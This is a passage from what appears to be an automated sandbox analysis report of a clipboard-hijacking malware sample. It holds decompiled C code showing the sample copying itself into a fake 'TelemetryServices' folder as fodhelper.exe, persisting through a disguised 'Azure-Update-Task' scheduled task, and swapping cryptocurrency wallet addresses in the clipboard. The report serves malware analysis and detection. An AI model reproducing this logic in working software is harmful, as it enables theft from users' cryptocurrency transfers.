                      • Instruction Fuzzy Hash: AF5179F2A51310ABC700BFB5AE0DA8A7EFCAA897477118477B305F21A1D7B856448F5C
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 100%
                      			_entry_() {
                      				WCHAR* _v8;
                      				void* _v12;
                      				signed int _v16;
                      				signed short* _v20;
                      				signed int _v24;
                      				long _v28;
                      				WCHAR* _t38;
                      				long _t40;
                      				signed short _t43;
                      				signed int _t48;
                      				signed int _t50;
                      				signed short* _t51;
                      				signed int _t52;
                      				signed int _t60;
                      				void* _t61;
                      				short _t63;
                      				WCHAR* _t65;
                      				signed short _t71;
                      				void* _t76;
                      				signed int _t78;
                      
                      				E00401000(); // executed
                      				CreateMutexW(0, 0, L"CH4PG3PB-6HT2VI9C-O2NL2NO5-QP1BW0EG"); // executed
                      				if(GetLastError() == 0xb7) {
                      					ExitProcess(0); // executed
                      				}
                      				E00401272(); // executed
                      				_t76 = _v28;
                      				while(1) {
                      					_t38 = E00401FEF();
                      					_t63 = 0;
                      					_v8 = _t38;
                      					if(_t38 == 0) {
                      						goto L23;
                      					}
                      					_t3 = lstrlenW(_t38) + 1; // 0x1
                      					_t40 = _t3 + _t3;
                      					_v28 = _t40;
                      					_v12 = LocalAlloc(0x40, _t40);
                      					E00401418(_t41, _t77, _v8);
                      					_t65 = _v8;
                      					_t78 = 0;
                      					_v16 = _v16 & 0;
                      					_t43 =  *_t65 & 0x0000ffff;
                      					_t71 = _t43;
                      					if(_t43 == 0) {
                      						L22:
                      						E00401F8B(_v12, lstrlenW(_v12));
                      						LocalFree(_v12);
                      					} else {
                      						_v20 = _t65;
                      						do {
                      							_v24 = _t71 & 0x0000ffff;
                      							_t48 = _t71 & 0x0000ffff;
                      							if(_t48 == 0xa || _t48 == 0xa0d || _t48 == 0xd || _t48 == 0x20 || _t48 == 9) {
                      								if(_t63 != 0) {
                      									 *(_t76 + _t78 * 2) = 0;
                      									_t63 = 0;
                      									E0040175F( &_v12, _t76);
                      									if(_t76 != 0) {
                      										LocalFree(_t76);
                      									}
                      									_t65 = _v8;
                      								}
                      							} else {
                      								_t60 = _v24 & 0x0000ffff;
                      								if(_t63 == 0) {
                      									_t61 = LocalAlloc(0x40, _v28);
                      									_t65 = _v8;
                      									_t76 = _t61;
                      									_t63 = _t63 + 1;
                      									_t78 = 0;
                      									_t60 =  *_v20 & 0x0000ffff;
                      								}
                      								 *(_t76 + _t78 * 2) = _t60;
                      								_t78 = _t78 + 1;
                      							}
                      							_t50 = _v16 + 1;
                      							_v16 = _t50;
                      							_t51 =  &(_t65[_t50]);
                      							_v20 = _t51;
                      							_t52 =  *_t51 & 0x0000ffff;
                      							_t71 = _t52;
                      						} while (_t52 != 0);
                      						if(_t63 != 0) {
                      							 *((short*)(_t76 + lstrlenW(_t76) * 2)) = 0;
                      							E0040175F( &_v12, _t76);
                      							if(_t76 != 0) {
                      								LocalFree(_t76);
                      							}
                      						}
                      						goto L22;
                      					}
                      					L23:
                      					Sleep(0xe1);
                      				}
                      			}























                      APIs
                        • Part of subcall function 00401000: LoadLibraryW.KERNEL32(kernel32.dll,00402039), ref: 0040100B
                        • Part of subcall function 00401000: GetProcAddress.KERNEL32(00000000,LoadLibraryW), ref: 0040102B
                        • Part of subcall function 00401000: LoadLibraryW.KERNEL32(ntdll.dll), ref: 00401041
                        • Part of subcall function 00401000: LoadLibraryW.KERNEL32(Shell32.dll), ref: 0040104F
                        • Part of subcall function 00401000: LoadLibraryW.KERNELBASE(Ole32.dll), ref: 0040105C
                        • Part of subcall function 00401000: LoadLibraryW.KERNEL32(User32.dll), ref: 00401069
                        • Part of subcall function 00401000: LoadLibraryW.KERNEL32(Ole32.dll), ref: 00401077
                        • Part of subcall function 00401000: GetProcAddress.KERNEL32(?,GetProcAddress), ref: 00401085
                        • Part of subcall function 00401000: GetProcAddress.KERNEL32(?,CreateDirectoryW), ref: 004010A2
                        • Part of subcall function 00401000: GetProcAddress.KERNEL32(?,GlobalAlloc), ref: 004010B3
                        • Part of subcall function 00401000: GetProcAddress.KERNEL32(?,GlobalFree), ref: 004010C4
                        • Part of subcall function 00401000: GetProcAddress.KERNEL32(?,GlobalLock), ref: 004010D5
                        • Part of subcall function 00401000: GetProcAddress.KERNEL32(?,GlobalUnlock), ref: 004010E6
                        • Part of subcall function 00401000: GetProcAddress.KERNEL32(?,LocalAlloc), ref: 004010F7
                        • Part of subcall function 00401000: GetProcAddress.KERNEL32(?,LocalFree), ref: 00401108
                        • Part of subcall function 00401000: GetProcAddress.KERNEL32(?,lstrlenW), ref: 00401119
                        • Part of subcall function 00401000: GetProcAddress.KERNEL32(?,StrChrW), ref: 0040112D
                        • Part of subcall function 00401000: GetProcAddress.KERNEL32(?,StrStrW), ref: 0040113E
                        • Part of subcall function 00401000: GetProcAddress.KERNEL32(?,StrStrIW), ref: 0040114F
                        • Part of subcall function 00401000: GetProcAddress.KERNEL32(?,StrToIntExW), ref: 0040115B
                        • Part of subcall function 00401000: GetProcAddress.KERNEL32(?,PathIsDirectoryW), ref: 00401167
                        • Part of subcall function 00401000: GetProcAddress.KERNEL32(00000000,CoInitialize), ref: 00401178
                        • Part of subcall function 00401000: GetProcAddress.KERNEL32(?,HeapFree), ref: 00401187
                      • CreateMutexW.KERNELBASE(00000000,00000000,CH4PG3PB-6HT2VI9C-O2NL2NO5-QP1BW0EG), ref: 00402042
                      • GetLastError.KERNEL32 ref: 00402048
                      • ExitProcess.KERNEL32 ref: 00402057
                      • lstrlenW.KERNEL32(00000000), ref: 00402078
                      • LocalAlloc.KERNEL32(00000040,00000000), ref: 0040208A
                      • LocalAlloc.KERNEL32(00000040,?,?), ref: 004020EE
                      • lstrlenW.KERNEL32(?,?), ref: 0040214D
                      • LocalFree.KERNEL32(?), ref: 00402168
                      • lstrlenW.KERNEL32(?,?), ref: 00402171
                      • LocalFree.KERNEL32(?), ref: 00402184
                      • Sleep.KERNEL32(000000E1), ref: 0040218F
                      Strings
                      • CH4PG3PB-6HT2VI9C-O2NL2NO5-QP1BW0EG, xrefs: 00402039
                      Memory Dump Source
                      • Source File: 00000011.00000002.526837252.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      Yara matches
                      Similarity
                      • API ID: AddressProc$LibraryLoad$Local$lstrlen$AllocFree$CreateErrorExitLastMutexProcessSleep
                      • String ID: CH4PG3PB-6HT2VI9C-O2NL2NO5-QP1BW0EG
                      • API String ID: 3526352376-3104312164
                      • Opcode ID: b0d771f7bd0cf0ebf5492d7c3bb0fc3ea961a89cc9db105f1e2bcedb7f084dea
                      • Instruction ID: 7e7fe45736c42aac81fc2ce1aa47f84d3ee5633dea0ad928d306184e7dbb2170
                      • Opcode Fuzzy Hash: b0d771f7bd0cf0ebf5492d7c3bb0fc3ea961a89cc9db105f1e2bcedb7f084dea
                      • Instruction Fuzzy Hash: DF4186749002159BCB119FA5DA88A7E77B5BF48701F10043AE742F72E0DBB89E01DB58
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 100%
                      			E00401339(void* __ecx, void* __eflags) {
                      				void* _v8;
                      				struct _PROCESS_INFORMATION _v24;
                      				struct _STARTUPINFOW _v92;
                      				int _t28;
                      				int _t49;
                      				void* _t50;
                      				void* _t51;
                      
                      				_t49 = 0x44;
                      				_t51 = __ecx;
                      				memset( &_v92, 0, _t49);
                      				_v92.cb = _t49;
                      				memset( &_v24, 0, 0x10);
                      				_v8 = LocalAlloc(0x40, 0x308);
                      				E00402230( &_v8, L"/C /create /F /sc minute /mo 1 /tn \"");
                      				E00402230( &_v8, L"Azure-Update-Task");
                      				E00402230( &_v8, L"\" /tr \"");
                      				E00402230( &_v8, _t51);
                      				E00402230( &_v8, "\"");
                      				_t50 = _v8;
                      				_t28 = CreateProcessW(L"C:\\Windows\\System32\\schtasks.exe", _t50, 0, 0, 0, 0x8000000, 0, 0,  &_v92,  &_v24); // executed
                      				if(_t28 != 0) {
                      					WaitForSingleObject(_v24.hProcess, 0xffffffff);
                      					CloseHandle(_v24);
                      					CloseHandle(_v24.hThread);
                      					if(_t50 != 0) {
                      						LocalFree(_t50);
                      					}
                      					return 1;
                      				}
                      				if(_t50 != 0) {
                      					LocalFree(_t50);
                      				}
                      				return 0;
                      			}










                      APIs
                      • memset.NTDLL ref: 0040134F
                      • memset.NTDLL ref: 0040135F
                      • LocalAlloc.KERNEL32(00000040,00000308), ref: 0040136F
                        • Part of subcall function 00402230: lstrlenW.KERNEL32(?,00000044,?,00000000,?,?,?,00401385), ref: 00402246
                        • Part of subcall function 00402230: lstrlenW.KERNEL32(/C /create /F /sc minute /mo 1 /tn ",00000044,?,00000000,?,?,?,00401385), ref: 00402253
                        • Part of subcall function 00402230: LocalAlloc.KERNEL32(00000040,00000001,?,00401385), ref: 00402264
                        • Part of subcall function 00402230: GlobalFree.KERNEL32 ref: 00402285
                      • CreateProcessW.KERNELBASE ref: 004013D1
                      • LocalFree.KERNEL32(?), ref: 004013E0
                      • WaitForSingleObject.KERNEL32(?,000000FF), ref: 004013EF
                      • CloseHandle.KERNEL32(?), ref: 004013FE
                      • CloseHandle.KERNEL32(?), ref: 00401403
                      • LocalFree.KERNEL32(?), ref: 0040140A
                      Strings
                      • Azure-Update-Task, xrefs: 00401385
                      • /C /create /F /sc minute /mo 1 /tn ", xrefs: 00401375
                      • C:\Windows\System32\schtasks.exe, xrefs: 004013CC
                      • " /tr ", xrefs: 00401392
                      Memory Dump Source
                      • Source File: 00000011.00000002.526837252.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      Yara matches
                      Similarity
                      • API ID: Local$Free$AllocCloseHandlelstrlenmemset$CreateGlobalObjectProcessSingleWait
                      • String ID: " /tr "$/C /create /F /sc minute /mo 1 /tn "$Azure-Update-Task$C:\Windows\System32\schtasks.exe
                      • API String ID: 2873265511-3368035720
                      • Opcode ID: e54fc4dd572a5fd0eeba04fe90cf6ad4a21f75fdf9b61720edab11825b488d62
                      • Instruction ID: d06e65cb243bbedc772da2b493071992bc36e5930b5998e92298165ae0813644
                      • Opcode Fuzzy Hash: e54fc4dd572a5fd0eeba04fe90cf6ad4a21f75fdf9b61720edab11825b488d62
                      • Instruction Fuzzy Hash: AC218171900108ABD710EBE0DE89EAF7B7CEB8075AF20007AB601B61E5DB745F058679
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 55%
                      			E00401339(void* __ecx, void* __eflags) {
                      				WCHAR* _v8;
                      				struct _PROCESS_INFORMATION _v24;
                      				struct _STARTUPINFOW _v92;
                      				int _t28;
                      				long _t49;
                      				WCHAR* _t50;
                      				void* _t51;
                      
                      				_t49 = 0x44;
                      				_t51 = __ecx;
                      				 *0x404028( &_v92, 0, _t49);
                      				_v92.cb = _t49;
                      				 *0x404028( &_v24, 0, 0x10);
                      				_v8 =  *0x404010(0x40, 0x308);
                      				E00402230( &_v8, L"/C /create /F /sc minute /mo 1 /tn \"");
                      				E00402230( &_v8, L"Azure-Update-Task");
                      				E00402230( &_v8, L"\" /tr \"");
                      				E00402230( &_v8, _t51);
                      				E00402230( &_v8, "\"");
                      				_t50 = _v8;
                      				_t28 = CreateProcessW(L"C:\\Windows\\System32\\schtasks.exe", _t50, 0, 0, 0, 0x8000000, 0, 0,  &_v92,  &_v24); // executed
                      				if(_t28 != 0) {
                      					WaitForSingleObject(_v24.hProcess, 0xffffffff);
                      					CloseHandle(_v24);
                      					CloseHandle(_v24.hThread);
                      					if(_t50 != 0) {
                      						 *0x404030(_t50);
                      					}
                      					return 1;
                      				}
                      				if(_t50 != 0) {
                      					 *0x404030(_t50);
                      				}
                      				return 0;
                      			}










                      APIs
                      • CreateProcessW.KERNELBASE ref: 004013D1
                      • WaitForSingleObject.KERNEL32(?,000000FF), ref: 004013EF
                      • CloseHandle.KERNEL32(?), ref: 004013FE
                      • CloseHandle.KERNEL32(?), ref: 00401403
                      Strings
                      • /C /create /F /sc minute /mo 1 /tn ", xrefs: 00401375
                      • C:\Windows\System32\schtasks.exe, xrefs: 004013CC
                      • " /tr ", xrefs: 00401392
                      • Azure-Update-Task, xrefs: 00401385
                      Memory Dump Source
                      • Source File: 00000011.00000001.524041171.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000011.00000001.524065932.0000000000405000.00000040.00020000.sdmp
                      Yara matches
                      Similarity
                      • API ID: CloseHandle$CreateObjectProcessSingleWait
                      • String ID: " /tr "$/C /create /F /sc minute /mo 1 /tn "$Azure-Update-Task$C:\Windows\System32\schtasks.exe
                      • API String ID: 2059082233-3368035720
                      • Opcode ID: e54fc4dd572a5fd0eeba04fe90cf6ad4a21f75fdf9b61720edab11825b488d62
                      • Instruction ID: d06e65cb243bbedc772da2b493071992bc36e5930b5998e92298165ae0813644
                      • Opcode Fuzzy Hash: e54fc4dd572a5fd0eeba04fe90cf6ad4a21f75fdf9b61720edab11825b488d62
                      • Instruction Fuzzy Hash: AC218171900108ABD710EBE0DE89EAF7B7CEB8075AF20007AB601B61E5DB745F058679
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 43%
                      			E00401272() {
                      				short _v524;
                      				short _v1044;
                      				WCHAR* _t15;
                      				int _t19;
                      				void* _t24;
                      
                      				 *0x40401c(0,  &_v1044, 0x104);
                      				_t15 =  &_v524;
                      				__imp__SHGetFolderPathW(0, 0x1a, 0, 0, _t15); // executed
                      				if(_t15 >= 0) {
                      					 *0x404014( &_v524, L"\\Microsoft\\TelemetryServices");
                      					_t19 = PathIsDirectoryW( &_v524); // executed
                      					if(_t19 == 0) {
                      						CreateDirectoryW( &_v524, 0); // executed
                      					}
                      					 *0x404014( &_v524, L"\\fodhelper.exe");
                      					_t24 =  *0x404054( &_v1044,  &_v524);
                      					_t37 = _t24;
                      					if(_t24 == 0) {
                      						CopyFileW( &_v1044,  &_v524, 0); // executed
                      						E00401339( &_v524, __eflags); // executed
                      						ExitProcess(0xffffffff);
                      					} else {
                      						return E00401339( &_v524, _t37);
                      					}
                      				}
                      				return _t15;
                      			}








                      APIs
                      • SHGetFolderPathW.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 0040129D
                      • PathIsDirectoryW.SHLWAPI(?), ref: 004012C0
                      • CreateDirectoryW.KERNELBASE(?,00000000), ref: 004012D2
                      • CopyFileW.KERNELBASE(?,?,00000000), ref: 0040131F
                      • ExitProcess.KERNEL32 ref: 00401332
                      Strings
                      Memory Dump Source
                      • Source File: 00000011.00000001.524041171.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000011.00000001.524065932.0000000000405000.00000040.00020000.sdmp
                      Yara matches
                      Similarity
                      • API ID: DirectoryPath$CopyCreateExitFileFolderProcess
                      • String ID: \Microsoft\TelemetryServices$\fodhelper.exe
                      • API String ID: 4082483661-1906870166
                      • Opcode ID: f66f439708cc94b4e392840ca1cbe4dfe63c53fae8d3378df9d81e2ac14c362b
                      • Instruction ID: e9cc1551c9dc342d01193394a0d7173058b5a03e9f69f18b49f700f051a2f683
                      • Opcode Fuzzy Hash: f66f439708cc94b4e392840ca1cbe4dfe63c53fae8d3378df9d81e2ac14c362b
                      • Instruction Fuzzy Hash: DC111FB1500229ABDB20DFA1DD4CECB7B7CAB45305F0005B1B769F20A1EA7497C48F68
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 40%
                      			_entry_() {
                      				signed short* _v8;
                      				char _v12;
                      				signed int _v16;
                      				signed short* _v20;
                      				signed int _v24;
                      				intOrPtr* _v28;
                      				signed short* _t38;
                      				intOrPtr _t40;
                      				signed short _t43;
                      				signed int _t48;
                      				signed int _t50;
                      				signed short* _t51;
                      				signed int _t52;
                      				signed int _t60;
                      				intOrPtr* _t61;
                      				short _t63;
                      				signed short* _t65;
                      				signed short _t71;
                      				intOrPtr* _t76;
                      				signed int _t78;
                      
                      				E00401000(); // executed
                      				CreateMutexW(0, 0, L"CH4PG3PB-6HT2VI9C-O2NL2NO5-QP1BW0EG"); // executed
                      				if( *0x40402c() == 0xb7) {
                      					ExitProcess(0); // executed
                      				}
                      				E00401272(); // executed
                      				_t76 = _v28;
                      				while(1) {
                      					_t38 = E00401FEF();
                      					_t63 = 0;
                      					_v8 = _t38;
                      					if(_t38 == 0) {
                      						goto L23;
                      					}
                      					_t3 =  *0x404020(_t38) + 1; // 0x1
                      					_t40 = _t3 + _t3;
                      					_v28 = _t40;
                      					_v12 =  *0x404010(0x40, _t40);
                      					E00401418(_t41, _t77, _v8);
                      					_t65 = _v8;
                      					_t78 = 0;
                      					_v16 = _v16 & 0;
                      					_t43 =  *_t65 & 0x0000ffff;
                      					_t71 = _t43;
                      					if(_t43 == 0) {
                      						L22:
                      						E00401F8B(_v12,  *0x404020(_v12));
                      						 *0x404030(_v12);
                      					} else {
                      						_v20 = _t65;
                      						do {
                      							_v24 = _t71 & 0x0000ffff;
                      							_t48 = _t71 & 0x0000ffff;
                      							if(_t48 == 0xa || _t48 == 0xa0d || _t48 == 0xd || _t48 == 0x20 || _t48 == 9) {
                      								if(_t63 != 0) {
                      									 *(_t76 + _t78 * 2) = 0;
                      									_t63 = 0;
                      									E0040175F( &_v12, _t76);
                      									if(_t76 != 0) {
                      										 *0x404030(_t76);
                      									}
                      									_t65 = _v8;
                      								}
                      							} else {
                      								_t60 = _v24 & 0x0000ffff;
                      								if(_t63 == 0) {
                      									_t61 =  *0x404010(0x40, _v28);
                      									_t65 = _v8;
                      									_t76 = _t61;
                      									_t63 = _t63 + 1;
                      									_t78 = 0;
                      									_t60 =  *_v20 & 0x0000ffff;
                      								}
                      								 *(_t76 + _t78 * 2) = _t60;
                      								_t78 = _t78 + 1;
                      							}
                      							_t50 = _v16 + 1;
                      							_v16 = _t50;
                      							_t51 =  &(_t65[_t50]);
                      							_v20 = _t51;
                      							_t52 =  *_t51 & 0x0000ffff;
                      							_t71 = _t52;
                      						} while (_t52 != 0);
                      						if(_t63 != 0) {
                      							 *((short*)(_t76 +  *0x404020(_t76) * 2)) = 0;
                      							E0040175F( &_v12, _t76);
                      							if(_t76 != 0) {
                      								 *0x404030(_t76);
                      							}
                      						}
                      						goto L22;
                      					}
                      					L23:
                      					Sleep(0xe1);
                      				}
                      			}

                      APIs
                        • Part of subcall function 00401000: LoadLibraryW.KERNEL32(kernel32.dll,00402039), ref: 0040100B
                        • Part of subcall function 00401000: GetProcAddress.KERNEL32(00000000,LoadLibraryW), ref: 0040102B
                        • Part of subcall function 00401000: LoadLibraryW.KERNELBASE(Ole32.dll), ref: 0040105C
                        • Part of subcall function 00401000: GetProcAddress.KERNEL32(?,GetProcAddress), ref: 00401085
                      • CreateMutexW.KERNELBASE(00000000,00000000,CH4PG3PB-6HT2VI9C-O2NL2NO5-QP1BW0EG), ref: 00402042
                      • ExitProcess.KERNEL32 ref: 00402057
                      • Sleep.KERNEL32(000000E1), ref: 0040218F
                      Strings
                      • CH4PG3PB-6HT2VI9C-O2NL2NO5-QP1BW0EG, xrefs: 00402039
                      Memory Dump Source
                      • Source File: 00000011.00000001.524041171.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000011.00000001.524065932.0000000000405000.00000040.00020000.sdmp
                      Yara matches
                      Similarity
                      • API ID: AddressLibraryLoadProc$CreateExitMutexProcessSleep
                      • String ID: CH4PG3PB-6HT2VI9C-O2NL2NO5-QP1BW0EG
                      • API String ID: 2723477443-3104312164
                      • Opcode ID: b0d771f7bd0cf0ebf5492d7c3bb0fc3ea961a89cc9db105f1e2bcedb7f084dea
                      • Instruction ID: 7e7fe45736c42aac81fc2ce1aa47f84d3ee5633dea0ad928d306184e7dbb2170
                      • Opcode Fuzzy Hash: b0d771f7bd0cf0ebf5492d7c3bb0fc3ea961a89cc9db105f1e2bcedb7f084dea
                      • Instruction Fuzzy Hash: DF4186749002159BCB119FA5DA88A7E77B5BF48701F10043AE742F72E0DBB89E01DB58
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Non-executed Functions

                      C-Code - Quality: 100%
                      			E00401F8B(void* __ecx, signed int __edx) {
                      				void* _t3;
                      				signed int _t6;
                      				void* _t13;
                      				void* _t16;
                      				int _t17;
                      
                      				_t17 = 2 + __edx * 2;
                      				_t16 = __ecx;
                      				_t3 = GlobalAlloc(2, _t17);
                      				_t13 = _t3;
                      				GlobalFix(_t13);
                      				memcpy(_t3, _t16, _t17);
                      				GlobalUnWire(_t13);
                      				_t6 = OpenClipboard(0);
                      				if(_t6 == 0) {
                      					return _t6 | 0xffffffff;
                      				}
                      				EmptyClipboard();
                      				SetClipboardData(0xd, _t13);
                      				CloseClipboard();
                      				GlobalFree(_t13);
                      				return 0;
                      			}

                      APIs
                      • GlobalAlloc.KERNEL32(00000002,00000000,?,00000000,00000000,00402181), ref: 00401F9A
                      • GlobalFix.KERNEL32(00000000), ref: 00401FA5
                      • memcpy.NTDLL(00000000), ref: 00401FAC
                      • GlobalUnWire.KERNEL32(00000000), ref: 00401FB6
                      • OpenClipboard.USER32(00000000), ref: 00401FBE
                      • EmptyClipboard.USER32 ref: 00401FC8
                      • SetClipboardData.USER32(0000000D,00000000), ref: 00401FD1
                      • CloseClipboard.USER32 ref: 00401FD7
                      • GlobalFree.KERNEL32 ref: 00401FDE
                      Memory Dump Source
                      • Source File: 00000011.00000002.526837252.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      Yara matches
                      Similarity
                      • API ID: ClipboardGlobal$AllocCloseDataEmptyFreeOpenWirememcpy
                      • String ID:
                      • API String ID: 2518647738-0
                      • Opcode ID: 6e8f05b13c52bda2192f9b5ea7998a520b2c1201303ff2b2893ffa802e95b434
                      • Instruction ID: a4bbc7e47bcce071b4eef353dccca8ba4e9b63a906a15cfc171d8899673e5865
                      • Opcode Fuzzy Hash: 6e8f05b13c52bda2192f9b5ea7998a520b2c1201303ff2b2893ffa802e95b434
                      • Instruction Fuzzy Hash: 1BF0DAF6601110ABE2002BF5BE4DF5B3E6CEBC9756F010535B306F51A1CA7488048779
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 100%
                      			E00401FEF() {
                      				void* _t3;
                      				void* _t7;
                      				void* _t9;
                      
                      				_t9 = 0;
                      				if(OpenClipboard(0) != 0) {
                      					_t3 = GetClipboardData(0xd);
                      					_t7 = _t3;
                      					if(_t7 != 0) {
                      						GlobalFix(_t7);
                      						_t9 = _t3;
                      						if(_t9 != 0) {
                      							GlobalUnWire(_t7);
                      						}
                      					}
                      					CloseClipboard();
                      				}
                      				return _t9;
                      			}

                      APIs
                      • OpenClipboard.USER32(00000000), ref: 00401FF3
                      • GetClipboardData.USER32(0000000D), ref: 00402000
                      • GlobalFix.KERNEL32(00000000), ref: 0040200D
                      • GlobalUnWire.KERNEL32(00000000), ref: 0040201A
                      • CloseClipboard.USER32 ref: 00402020
                      Memory Dump Source
                      • Source File: 00000011.00000002.526837252.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      Yara matches
                      Similarity
                      • API ID: Clipboard$Global$CloseDataOpenWire
                      • String ID:
                      • API String ID: 1198520892-0
                      • Opcode ID: 3c49645208ac729d989d0f948fee9bd6a50bf7ba83a65ea476ea956c222f9c8c
                      • Instruction ID: 411f3c792f7164cc8364f065ae2bfd11b7a554dc62cab6a226cdce1d1bfb6340
                      • Opcode Fuzzy Hash: 3c49645208ac729d989d0f948fee9bd6a50bf7ba83a65ea476ea956c222f9c8c
                      • Instruction Fuzzy Hash: 9BE0867210172197C23227647E0CB6FAA28DFC5B52B060037FB01F22A0CB78CC05C5AC
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 100%
                      			E00401542(WCHAR* __ecx) {
                      				signed int _t4;
                      				WCHAR* _t8;
                      				void* _t12;
                      				short _t13;
                      				WCHAR* _t14;
                      				WCHAR* _t15;
                      
                      				_t14 = __ecx;
                      				if(lstrlenW(__ecx) == 0x5f || lstrlenW(_t14) == 0x6a) {
                      					_t12 = 0x34;
                      					if( *_t14 != _t12) {
                      						goto L20;
                      					} else {
                      						_t4 = _t14[1] & 0x0000ffff;
                      						_t13 = 0x30;
                      						if(_t4 == 0x41 || _t4 == 0x42 || _t4 == _t13 || _t4 == 0x31 || _t4 == 0x32 || _t4 == 0x33 || _t4 == _t12 || _t4 == 0x35 || _t4 == 0x36 || _t4 == 0x37 || _t4 == 0x38 || _t4 == 0x39) {
                      							_t15 =  &(_t14[2]);
                      							if(StrChrW(_t15, _t13) != 0 || StrChrW(_t15, 0x4f) != 0 || StrChrW(_t15, 0x49) != 0) {
                      								goto L20;
                      							} else {
                      								_t8 = StrChrW(_t15, 0x6c);
                      								if(_t8 != 0) {
                      									goto L20;
                      								} else {
                      									return  &(_t8[0]);
                      								}
                      							}
                      						} else {
                      							goto L20;
                      						}
                      					}
                      				} else {
                      					L20:
                      					return 0;
                      				}
                      			}

                      APIs
                      • lstrlenW.KERNEL32(?,?,00401AF2,?,00402163), ref: 00401546
                      • lstrlenW.KERNEL32(?,?,00402163), ref: 00401552
                      • StrChrW.SHLWAPI(?,00000030,?,00402163), ref: 004015B1
                      • StrChrW.SHLWAPI(?,0000004F,?,00402163), ref: 004015BE
                      • StrChrW.SHLWAPI(?,00000049,?,00402163), ref: 004015CB
                      • StrChrW.SHLWAPI(?,0000006C,?,00402163), ref: 004015D8
                      Memory Dump Source
                      • Source File: 00000011.00000002.526837252.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      Yara matches
                      Similarity
                      • API ID: lstrlen
                      • String ID:
                      • API String ID: 1659193697-0
                      • Opcode ID: 8a283dcc1fafb251700af5242f731a1eeea3e3d4b9c97067a0a82040f63f5109
                      • Instruction ID: 6568eeaef115c58ffa2f60ffa8eb15a6e5f32d2d88c572dda17d6d64263e7df9
                      • Opcode Fuzzy Hash: 8a283dcc1fafb251700af5242f731a1eeea3e3d4b9c97067a0a82040f63f5109
                      • Instruction Fuzzy Hash: 9711A5A9D82110B6DB391A686C8CB7F22945FC27547584437EA03FE2F0F23CCE82558D
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 100%
                      			E00401684(WCHAR* __ecx) {
                      				signed int _t4;
                      				WCHAR* _t8;
                      				void* _t11;
                      				WCHAR* _t12;
                      				WCHAR* _t13;
                      
                      				_t12 = __ecx;
                      				_t11 = 0x44;
                      				if( *__ecx != _t11 || lstrlenW(__ecx) != 0x22) {
                      					L31:
                      					return 0;
                      				} else {
                      					_t4 =  *(_t12 + 2) & 0x0000ffff;
                      					if(_t4 == 0x41 || _t4 == 0x42 || _t4 == 0x43 || _t4 == _t11 || _t4 == 0x45 || _t4 == 0x46 || _t4 == 0x47 || _t4 == 0x48 || _t4 == 0x4a || _t4 == 0x4b || _t4 == 0x4c || _t4 == 0x4d || _t4 == 0x4e || _t4 == 0x50 || _t4 == 0x51 || _t4 == 0x52 || _t4 == 0x53 || _t4 == 0x54 || _t4 == 0x55 || _t4 == 0x35 || _t4 == 0x36 || _t4 == 0x37 || _t4 == 0x38 || _t4 == 0x39) {
                      						_t13 = _t12 + 4;
                      						if(StrChrW(_t13, 0x30) != 0 || StrChrW(_t13, 0x4f) != 0 || StrChrW(_t13, 0x49) != 0) {
                      							goto L31;
                      						} else {
                      							_t8 = StrChrW(_t13, 0x6c);
                      							if(_t8 != 0) {
                      								goto L31;
                      							}
                      							return  &(_t8[0]);
                      						}
                      					} else {
                      						goto L31;
                      					}
                      				}
                      			}

                      APIs
                      • lstrlenW.KERNEL32(?,?,?,00401B56,?,00402163), ref: 00401695
                      • StrChrW.SHLWAPI(?,00000030,?,00402163), ref: 00401726
                      • StrChrW.SHLWAPI(?,0000004F,?,00402163), ref: 00401733
                      • StrChrW.SHLWAPI(?,00000049,?,00402163), ref: 00401740
                      • StrChrW.SHLWAPI(?,0000006C,?,00402163), ref: 0040174D
                      Memory Dump Source
                      • Source File: 00000011.00000002.526837252.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      Yara matches
                      Similarity
                      • API ID: lstrlen
                      • String ID:
                      • API String ID: 1659193697-0
                      • Opcode ID: 033baab36fa4e63d4656868d84d7ccad315465f935aa9d4d00be32e2960f9c69
                      • Instruction ID: 9b70e747a6d832c5252a26d5990cd4b89b60fd6c348497c2eedcdf83e6538b30
                      • Opcode Fuzzy Hash: 033baab36fa4e63d4656868d84d7ccad315465f935aa9d4d00be32e2960f9c69
                      • Instruction Fuzzy Hash: EE1193B1A4019A55DB382A3858C867F2AD45B52BD1B284937F206FB3F0D2BCCDC3516E
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 100%
                      			E004015E9(WCHAR* __ecx) {
                      				signed int _t4;
                      				WCHAR* _t8;
                      				void* _t11;
                      				short _t12;
                      				intOrPtr* _t13;
                      				WCHAR* _t14;
                      
                      				_t13 = __ecx;
                      				if(lstrlenW(__ecx) != 0x5f) {
                      					L19:
                      					return 0;
                      				} else {
                      					_t11 = 0x38;
                      					if( *_t13 != _t11) {
                      						goto L19;
                      					} else {
                      						_t4 =  *(_t13 + 2) & 0x0000ffff;
                      						_t12 = 0x30;
                      						if(_t4 == 0x41 || _t4 == 0x42 || _t4 == _t12 || _t4 == 0x31 || _t4 == 0x32 || _t4 == 0x33 || _t4 == 0x34 || _t4 == 0x35 || _t4 == 0x36 || _t4 == 0x37 || _t4 == _t11 || _t4 == 0x39) {
                      							_t14 = _t13 + 4;
                      							if(StrChrW(_t14, _t12) != 0 || StrChrW(_t14, 0x4f) != 0 || StrChrW(_t14, 0x49) != 0) {
                      								goto L19;
                      							} else {
                      								_t8 = StrChrW(_t14, 0x6c);
